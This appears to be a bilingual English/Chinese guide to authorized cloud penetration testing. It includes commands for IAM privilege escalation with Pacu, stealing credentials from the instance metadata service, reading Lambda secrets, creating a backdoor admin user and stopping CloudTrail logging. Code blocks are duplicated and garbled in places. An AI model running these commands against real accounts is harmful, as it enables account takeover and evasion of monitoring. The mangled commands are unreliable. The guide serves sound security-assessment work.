conducting-cloud-penetration-testing
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseConducting Cloud Penetration Testing
云环境渗透测试实施指南
When to Use
适用场景
- When performing authorized security assessments of cloud environments before production deployment
- When validating cloud security controls after a major architectural change or migration
- When compliance requirements mandate annual penetration testing of cloud infrastructure
- When testing incident response readiness by simulating realistic cloud-based attack scenarios
- When assessing lateral movement risk across multi-account or multi-cloud environments
Do not use for unauthorized testing against cloud accounts, for testing cloud provider infrastructure itself (covered by the shared responsibility model), or for DDoS simulation without explicit cloud provider approval.
- 在生产部署前对云环境进行授权安全评估时
- 在重大架构变更或迁移后验证云安全控制措施时
- 合规要求强制每年对云基础设施进行渗透测试时
- 通过模拟真实云攻击场景测试事件响应准备情况时
- 评估跨多账户或多云环境的横向移动风险时
禁止使用场景
针对云账户进行未授权测试、测试云提供商自身基础设施(属于共享责任模型中提供商负责的范围),或在未获得云提供商明确批准的情况下进行DDoS模拟测试。
Prerequisites
前置条件
- Written authorization from the cloud account owner and scope definition document
- AWS, Azure, or GCP penetration testing policy acknowledgment (AWS no longer requires pre-approval for most services)
- Isolated testing account or explicitly scoped production account with breakglass procedures
- Cloud-specific offensive tooling installed: Pacu (AWS), ScoutSuite, Prowler, CloudFox
- MITRE ATT&CK Cloud matrix for finding classification
- 云账户所有者的书面授权以及范围定义文档
- 确认知晓AWS、Azure或GCP的渗透测试政策(AWS目前对大多数服务不再需要预先批准)
- 隔离的测试账户或明确定义范围的生产账户,并配备紧急恢复流程
- 已安装云专用攻防工具:Pacu(AWS专用)、ScoutSuite、Prowler、CloudFox
- 用于结果分类的MITRE ATT&CK Cloud矩阵
Workflow
实施流程
Step 1: Define Scope and Rules of Engagement
步骤1:定义测试范围与参与规则
Establish testing boundaries based on the shared responsibility model. The customer is responsible for testing configurations, IAM policies, application security, and data protection. The cloud provider manages physical infrastructure, hypervisor, and managed service internals.
Cloud Penetration Test Scope Document
=======================================
Target: AWS Account 123456789012 (Production)
Testing Window: 2025-02-24 08:00 UTC to 2025-02-28 18:00 UTC
Authorization: Signed by CISO, dated 2025-02-20
IN SCOPE:
- IAM users, roles, policies, and cross-account trust
- EC2 instances, security groups, and network ACLs
- S3 bucket policies and data access controls
- Lambda functions, API Gateway endpoints
- RDS/DynamoDB access controls and encryption
- EKS cluster RBAC and network policies
- CloudTrail, Config, and monitoring gaps
OUT OF SCOPE:
- AWS managed service internals (RDS engine, Lambda runtime)
- DDoS attacks or volumetric testing
- Physical infrastructure or hypervisor attacks
- Social engineering of AWS support
EMERGENCY CONTACT: security-ops@company.com, +1-555-0199基于共享责任模型确立测试边界。客户负责测试配置、IAM策略、应用安全和数据保护;云提供商负责管理物理基础设施、虚拟机管理程序和托管服务的内部机制。
Cloud Penetration Test Scope Document
=======================================
Target: AWS Account 123456789012 (Production)
Testing Window: 2025-02-24 08:00 UTC to 2025-02-28 18:00 UTC
Authorization: Signed by CISO, dated 2025-02-20
IN SCOPE:
- IAM users, roles, policies, and cross-account trust
- EC2 instances, security groups, and network ACLs
- S3 bucket policies and data access controls
- Lambda functions, API Gateway endpoints
- RDS/DynamoDB access controls and encryption
- EKS cluster RBAC and network policies
- CloudTrail, Config, and monitoring gaps
OUT OF SCOPE:
- AWS managed service internals (RDS engine, Lambda runtime)
- DDoS attacks or volumetric testing
- Physical infrastructure or hypervisor attacks
- Social engineering of AWS support
EMERGENCY CONTACT: security-ops@company.com, +1-555-0199Step 2: Reconnaissance and Cloud Enumeration
步骤2:侦察与云资源枚举
Use cloud-specific tools to enumerate the attack surface: exposed services, public IPs, S3 buckets, IAM configurations, and metadata endpoints.
bash
undefined使用云专用工具枚举攻击面:暴露的服务、公网IP、S3存储桶、IAM配置和元数据端点。
bash
undefinedScoutSuite multi-cloud assessment
ScoutSuite multi-cloud assessment
scout suite aws --profile target-account --report-dir ./scout-report
scout suite aws --profile target-account --report-dir ./scout-report
Prowler comprehensive AWS security assessment
Prowler comprehensive AWS security assessment
prowler aws -M json-ocsf -o ./prowler-output --profile target-account
prowler aws -M json-ocsf -o ./prowler-output --profile target-account
CloudFox for identifying privilege escalation paths
CloudFox for identifying privilege escalation paths
cloudfox aws --profile target-account all-checks
cloudfox aws --profile target-account all-checks
Enumerate public S3 buckets
Enumerate public S3 buckets
for bucket in $(aws s3api list-buckets --query 'Buckets[*].Name' --output text); do
aws s3api get-bucket-policy-status --bucket $bucket 2>/dev/null | grep -q "true" && echo "PUBLIC: $bucket"
done
for bucket in $(aws s3api list-buckets --query 'Buckets[*].Name' --output text); do
aws s3api get-bucket-policy-status --bucket $bucket 2>/dev/null | grep -q "true" && echo "PUBLIC: $bucket"
done
Check for IMDS v1 (vulnerable to SSRF)
Check for IMDS v1 (vulnerable to SSRF)
aws ec2 describe-instances
--query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]'
--output table
--query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]'
--output table
undefinedaws ec2 describe-instances
--query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]'
--output table
--query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]'
--output table
undefinedStep 3: IAM Privilege Escalation Testing
步骤3:IAM权限提升测试
Use Pacu to identify and exploit IAM misconfigurations that allow privilege escalation from a low-privilege starting point to administrative access.
bash
undefined使用Pacu识别并利用IAM配置错误,实现从低权限起点提升至管理员权限。
bash
undefinedInitialize Pacu session
Initialize Pacu session
pacu
pacu
Set stolen or test credentials
Set stolen or test credentials
set_keys --key-alias test-creds
set_keys --key-alias test-creds
Run IAM enumeration modules
Run IAM enumeration modules
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
Check for privilege escalation paths
Check for privilege escalation paths
run iam__privesc_scan
run iam__privesc_scan
Common escalation paths to test:
Common escalation paths to test:
1. iam:CreatePolicyVersion - Create new policy version with admin access
1. iam:CreatePolicyVersion - Create new policy version with admin access
2. iam:AttachUserPolicy - Attach AdministratorAccess to self
2. iam:AttachUserPolicy - Attach AdministratorAccess to self
3. iam:PassRole + lambda:CreateFunction - Create Lambda with admin role
3. iam:PassRole + lambda:CreateFunction - Create Lambda with admin role
4. iam:PassRole + ec2:RunInstances - Launch EC2 with admin instance profile
4. iam:PassRole + ec2:RunInstances - Launch EC2 with admin instance profile
5. sts:AssumeRole - Cross-account role assumption without MFA condition
5. sts:AssumeRole - Cross-account role assumption without MFA condition
undefinedundefinedStep 4: SSRF to Cloud Metadata Service Exploitation
步骤4:利用SSRF攻击云元数据服务
Test web applications for Server-Side Request Forgery vulnerabilities that can reach the instance metadata service (IMDS) at 169.254.169.254 to steal IAM role credentials.
bash
undefined测试Web应用中的服务器端请求伪造(SSRF)漏洞,此类漏洞可访问位于169.254.169.254的实例元数据服务(IMDS)以窃取IAM角色凭证。
bash
undefinedTest for IMDS v1 access (no token required)
Test for IMDS v1 access (no token required)
Test for IMDS v2 (requires token - more secure)
Test for IMDS v2 (requires token - more secure)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token"
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/meta-data/iam/security-credentials/
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/meta-data/iam/security-credentials/
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token"
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/meta-data/iam/security-credentials/
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Azure IMDS equivalent
Azure IMDS equivalent
GCP metadata service
GCP metadata service
curl -H "Metadata-Flavor: Google"
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
undefinedcurl -H "Metadata-Flavor: Google"
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
undefinedStep 5: Lateral Movement and Data Access
步骤5:横向移动与数据访问测试
Test cross-account role assumptions, VPC peering connections, and shared resource access to map lateral movement opportunities.
bash
undefined测试跨账户角色信任、VPC对等连接和共享资源访问,以梳理横向移动路径。
bash
undefinedEnumerate cross-account role trusts
Enumerate cross-account role trusts
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS!=]].[RoleName,Arn]' --output table
nullaws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS!=]].[RoleName,Arn]' --output table
nullTest cross-account assumption
Test cross-account assumption
aws sts assume-role
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole
--role-session-name pentest-session
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole
--role-session-name pentest-session
aws sts assume-role
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole
--role-session-name pentest-session
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole
--role-session-name pentest-session
Enumerate accessible S3 data with stolen credentials
Enumerate accessible S3 data with stolen credentials
aws s3 ls --recursive s3://target-bucket/ --summarize
aws s3 ls --recursive s3://target-bucket/ --summarize
Check Lambda environment variables for secrets
Check Lambda environment variables for secrets
aws lambda list-functions --query 'Functions[*].[FunctionName]' --output text | while read fn; do
aws lambda get-function-configuration --function-name "$fn"
--query 'Environment.Variables' --output json 2>/dev/null done
--query 'Environment.Variables' --output json 2>/dev/null done
undefinedaws lambda list-functions --query 'Functions[*].[FunctionName]' --output text | while read fn; do
aws lambda get-function-configuration --function-name "$fn"
--query 'Environment.Variables' --output json 2>/dev/null done
--query 'Environment.Variables' --output json 2>/dev/null done
undefinedStep 6: Persistence and Detection Evasion Testing
步骤6:持久化与规避检测测试
Test whether the organization's monitoring detects persistence mechanisms such as new IAM users, access keys, Lambda backdoors, or CloudTrail disabling.
bash
undefined测试组织的监控机制是否能检测到持久化手段,例如新建IAM用户、访问密钥、Lambda后门或禁用CloudTrail等操作。
bash
undefinedTest: Create backdoor IAM user (authorized test only)
Test: Create backdoor IAM user (authorized test only)
aws iam create-user --user-name pentest-backdoor
aws iam create-access-key --user-name pentest-backdoor
aws iam attach-user-policy --user-name pentest-backdoor
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-user --user-name pentest-backdoor
aws iam create-access-key --user-name pentest-backdoor
aws iam attach-user-policy --user-name pentest-backdoor
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Test: Disable CloudTrail (verify GuardDuty alerts)
Test: Disable CloudTrail (verify GuardDuty alerts)
aws cloudtrail stop-logging --name management-trail
aws cloudtrail stop-logging --name management-trail
Test: Create Lambda for persistence (authorized test only)
Test: Create Lambda for persistence (authorized test only)
Verify: Did GuardDuty generate Stealth:IAMUser/CloudTrailLoggingDisabled?
Verify: Did GuardDuty generate Stealth:IAMUser/CloudTrailLoggingDisabled?
Verify: Did Security Hub alert on the new admin user?
Verify: Did Security Hub alert on the new admin user?
CLEANUP: Remove all persistence artifacts after testing
CLEANUP: Remove all persistence artifacts after testing
aws iam delete-access-key --user-name pentest-backdoor --access-key-id AKIAEXAMPLE
aws iam detach-user-policy --user-name pentest-backdoor
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam delete-user --user-name pentest-backdoor aws cloudtrail start-logging --name management-trail
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam delete-user --user-name pentest-backdoor aws cloudtrail start-logging --name management-trail
undefinedaws iam delete-access-key --user-name pentest-backdoor --access-key-id AKIAEXAMPLE
aws iam detach-user-policy --user-name pentest-backdoor
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam delete-user --user-name pentest-backdoor aws cloudtrail start-logging --name management-trail
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam delete-user --user-name pentest-backdoor aws cloudtrail start-logging --name management-trail
undefinedStep 7: Report Findings with MITRE ATT&CK Mapping
步骤7:结合MITRE ATT&CK映射报告测试结果
Document all findings mapped to the MITRE ATT&CK Cloud matrix with severity, proof of concept, business impact, and remediation guidance.
记录所有测试结果,并按照MITRE ATT&CK Cloud矩阵进行映射,包含风险等级、概念验证、业务影响和修复建议。
Key Concepts
核心概念
| Term | Definition |
|---|---|
| Shared Responsibility Model | Cloud security framework where the provider secures infrastructure and the customer secures data, configurations, and access controls |
| IMDS | Instance Metadata Service at 169.254.169.254 that provides instance identity, credentials, and configuration data; IMDSv2 requires token-based access |
| Privilege Escalation | Exploiting IAM misconfigurations to elevate from limited permissions to administrative access within a cloud account |
| Lateral Movement | Using compromised credentials or trust relationships to access resources in other accounts, VPCs, or cloud providers |
| Pacu | Open-source AWS exploitation framework for penetration testing, providing modules for enumeration, escalation, and persistence |
| ScoutSuite | Multi-cloud security auditing tool that collects configuration data and generates HTML reports with risk findings |
| MITRE ATT&CK Cloud | Adversary tactics and techniques matrix specific to cloud environments including Initial Access, Execution, Persistence, and Exfiltration |
| 术语 | 定义 |
|---|---|
| Shared Responsibility Model | 云安全框架,其中提供商负责基础设施安全,客户负责数据、配置和访问控制的安全 |
| IMDS | 位于169.254.169.254的实例元数据服务,提供实例身份、凭证和配置数据;IMDSv2需要基于令牌的访问 |
| Privilege Escalation | 利用IAM配置错误,将云账户内的权限从有限权限提升至管理员权限 |
| Lateral Movement | 利用泄露的凭证或信任关系访问其他账户、VPC或云提供商中的资源 |
| Pacu | 用于渗透测试的开源AWS利用框架,提供枚举、权限提升和持久化测试的模块 |
| ScoutSuite | 多云安全审计工具,收集配置数据并生成包含风险发现的HTML报告 |
| MITRE ATT&CK Cloud | 针对云环境的对手战术与技术矩阵,包括初始访问、执行、持久化和数据泄露等类别 |
Tools & Systems
工具与系统
- Pacu: AWS-focused exploitation framework with modules for IAM enumeration, privilege escalation, and persistence testing
- ScoutSuite: Multi-cloud (AWS, Azure, GCP) security auditing tool generating comprehensive risk reports from API data collection
- CloudFox: AWS and Azure enumeration tool for identifying attack paths, privilege escalation vectors, and data access opportunities
- Prowler: Open-source cloud security assessment tool with 300+ checks across AWS, Azure, and GCP
- Cartography: Neo4j-based tool that maps relationships between cloud resources for visual attack path analysis
- Pacu: 专注于AWS的利用框架,包含IAM枚举、权限提升和持久化测试的模块
- ScoutSuite: 多云(AWS、Azure、GCP)安全审计工具,通过API数据收集生成全面的风险报告
- CloudFox: AWS和Azure枚举工具,用于识别攻击路径、权限提升向量和数据访问机会
- Prowler: 开源云安全评估工具,在AWS、Azure和GCP上有300+项检查项
- Cartography: 基于Neo4j的工具,用于映射云资源之间的关系,实现可视化攻击路径分析
Common Scenarios
常见场景
Scenario: SSRF in Web Application Leads to Full Account Compromise
场景:Web应用中的SSRF漏洞导致全账户沦陷
Context: A penetration tester discovers an SSRF vulnerability in a web application hosted on an EC2 instance running IMDSv1. The instance has an IAM role with broad S3 and Lambda permissions.
Approach:
- Exploit the SSRF to reach http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
- Extract temporary IAM credentials (AccessKeyId, SecretAccessKey, SessionToken)
- Use the credentials to enumerate accessible S3 buckets and download sensitive data
- Check if the role has iam:PassRole + lambda:CreateFunction for privilege escalation to admin
- Document the full attack chain from SSRF to account-level compromise
- Recommend: enforce IMDSv2, reduce IAM role scope, add VPC endpoint policies blocking IMDS from application tier
Pitfalls: Not testing IMDSv2 enforcement separately from IMDSv1 gives incomplete results. Failing to clean up test artifacts (backdoor users, Lambda functions) leaves real vulnerabilities after the engagement.
背景:渗透测试人员发现在运行IMDSv1的EC2实例上托管的Web应用存在SSRF漏洞,该实例关联的IAM角色拥有广泛的S3和Lambda权限。
实施步骤:
- 利用SSRF漏洞访问http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
- 提取临时IAM凭证(AccessKeyId、SecretAccessKey、SessionToken)
- 使用凭证枚举可访问的S3存储桶并下载敏感数据
- 检查该角色是否拥有iam:PassRole + lambda:CreateFunction权限,以实现管理员权限提升
- 记录从SSRF到账户沦陷的完整攻击链
- 修复建议:强制启用IMDSv2、缩小IAM角色权限范围、添加阻止IMDS访问的VPC端点策略
注意事项:单独测试IMDSv2而不测试IMDSv1会导致结果不完整;测试后未清理测试遗留物(后门用户、Lambda函数)会留下真实的安全漏洞。
Output Format
输出报告格式
Cloud Penetration Test Report
===============================
Target: AWS Account 123456789012 (Production)
Testing Period: 2025-02-24 to 2025-02-28
Methodology: MITRE ATT&CK Cloud + OWASP Cloud Testing Guide
Tester: Security Team - Authorized Engagement
EXECUTIVE SUMMARY:
Starting with read-only developer credentials, the assessment achieved
full administrative access to the production account within 3 hours through
an IAM privilege escalation chain. 47 findings identified across 7 ATT&CK tactics.
CRITICAL FINDINGS:
[PT-001] IAM Privilege Escalation via iam:CreatePolicyVersion
ATT&CK: T1098.001 (Account Manipulation: Additional Cloud Credentials)
Severity: CRITICAL
Starting Point: Developer role with iam:CreatePolicyVersion permission
Impact: Full administrative access to all account resources
Evidence: Created policy version granting iam:* and s3:* to test role
Remediation: Remove iam:CreatePolicyVersion from developer roles, add permission boundary
[PT-002] SSRF to IMDS Credential Theft
ATT&CK: T1552.005 (Unsecured Credentials: Cloud Instance Metadata API)
Severity: CRITICAL
Starting Point: Web application URL parameter vulnerable to SSRF
Impact: Extracted IAM role credentials with S3 and Lambda access
Remediation: Enforce IMDSv2, apply WAF rules for SSRF, restrict IAM role scope
FINDING SUMMARY BY MITRE ATT&CK TACTIC:
Initial Access: 4 findings
Execution: 3 findings
Persistence: 6 findings
Privilege Escalation: 8 findings (3 Critical)
Defense Evasion: 5 findings
Credential Access: 7 findings
Discovery: 14 findings
Total: 47 findingsCloud Penetration Test Report
===============================
Target: AWS Account 123456789012 (Production)
Testing Period: 2025-02-24 to 2025-02-28
Methodology: MITRE ATT&CK Cloud + OWASP Cloud Testing Guide
Tester: Security Team - Authorized Engagement
EXECUTIVE SUMMARY:
Starting with read-only developer credentials, the assessment achieved
full administrative access to the production account within 3 hours through
an IAM privilege escalation chain. 47 findings identified across 7 ATT&CK tactics.
CRITICAL FINDINGS:
[PT-001] IAM Privilege Escalation via iam:CreatePolicyVersion
ATT&CK: T1098.001 (Account Manipulation: Additional Cloud Credentials)
Severity: CRITICAL
Starting Point: Developer role with iam:CreatePolicyVersion permission
Impact: Full administrative access to all account resources
Evidence: Created policy version granting iam:* and s3:* to test role
Remediation: Remove iam:CreatePolicyVersion from developer roles, add permission boundary
[PT-002] SSRF to IMDS Credential Theft
ATT&CK: T1552.005 (Unsecured Credentials: Cloud Instance Metadata API)
Severity: CRITICAL
Starting Point: Web application URL parameter vulnerable to SSRF
Impact: Extracted IAM role credentials with S3 and Lambda access
Remediation: Enforce IMDSv2, apply WAF rules for SSRF, restrict IAM role scope
FINDING SUMMARY BY MITRE ATT&CK TACTIC:
Initial Access: 4 findings
Execution: 3 findings
Persistence: 6 findings
Privilege Escalation: 8 findings (3 Critical)
Defense Evasion: 5 findings
Credential Access: 7 findings
Discovery: 14 findings
Total: 47 findings